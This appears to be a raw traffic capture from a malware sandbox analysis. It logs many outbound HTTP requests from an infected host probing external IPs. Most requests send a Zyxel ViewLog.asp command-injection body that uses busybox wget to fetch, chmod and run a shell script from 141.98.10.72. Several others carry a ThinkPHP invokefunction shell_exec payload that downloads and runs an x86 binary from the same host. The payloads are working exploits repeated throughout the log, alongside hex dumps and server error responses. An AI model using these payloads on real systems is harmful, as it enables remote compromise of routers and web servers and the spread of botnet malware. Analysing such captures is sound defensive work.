                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:51.897484064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:03.417217970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:26.968641043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:14.071458101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      330192.168.2.155573894.121.70.578080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.463227987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      331192.168.2.154928662.29.4.1528080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.463370085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      332192.168.2.154355088.150.154.8980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.557095051 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:40.752705097 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:29:40 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      333192.168.2.155702095.127.222.12180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.613939047 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:41.764339924 CET16INHTTP/1.0 200 OK
                                                      Data Raw:
                                                      Data Ascii:
                                                      Feb 14, 2024 09:29:41.788403988 CET303INData Raw: 53 65 72 76 65 72 3a 20 47 6f 41 68 65 61 64 2d 57 65 62 73 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 53 49 44 3d 38 31 36 37 30 32 30 61 39 32 64 30 34 35 38 37 39
                                                      Data Ascii: Server: GoAhead-WebsX-Frame-Options: SAMEORIGINSet-Cookie: SID=8167020a92d045879fc1a74ab9eb038d; Max-Age=1200; Version=1Pragma: no-cacheCache-control: no-cacheContent-Type: text/html<html><head></head><body><script language=javascript>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      334192.168.2.155283862.29.36.1868080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.700942993 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      335192.168.2.155739294.121.40.308080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.701050997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      336192.168.2.155006431.47.61.988080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.728853941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:41.007051945 CET502INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:29:40 GMT
                                                      Server: Apache
                                                      Content-Length: 338
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      337192.168.2.154215885.194.96.398080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:40.734076023 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:41.001857042 CET251INHTTP/1.1 407 Unauthorized
                                                      Server: Zscaler proxy
                                                      Cache-control: no-cache
                                                      Content-Length: 0
                                                      Proxy-Authenticate: Digest realm="zscloud.net", qop="auth", opaque="2802348cd031ea39faf70f72f0b59b94", nonce=09d0c5448c4ba150884b13cee5517ce6


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      338192.168.2.155554031.33.8.2348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:41.188046932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:44.217705011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      339192.168.2.155181485.22.139.2358080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:41.217230082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      340192.168.2.153829494.123.53.1928080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:41.233452082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      341192.168.2.153979494.122.69.758080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:41.235153913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      342192.168.2.154840694.25.157.1868080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:41.257910967 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:41.546916008 CET337INHTTP/1.1 405 Not Allowed
                                                      Server: Web server
                                                      Date: Wed, 14 Feb 2024 08:29:36 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 155
                                                      Connection: keep-alive
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      343192.168.2.154918485.122.212.458080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:41.327234030 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      344192.168.2.155631231.136.242.2538080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:41.438858986 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:42.073757887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:43.321741104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:46.009773016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:51.129528046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:01.113245010 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:22.872689009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
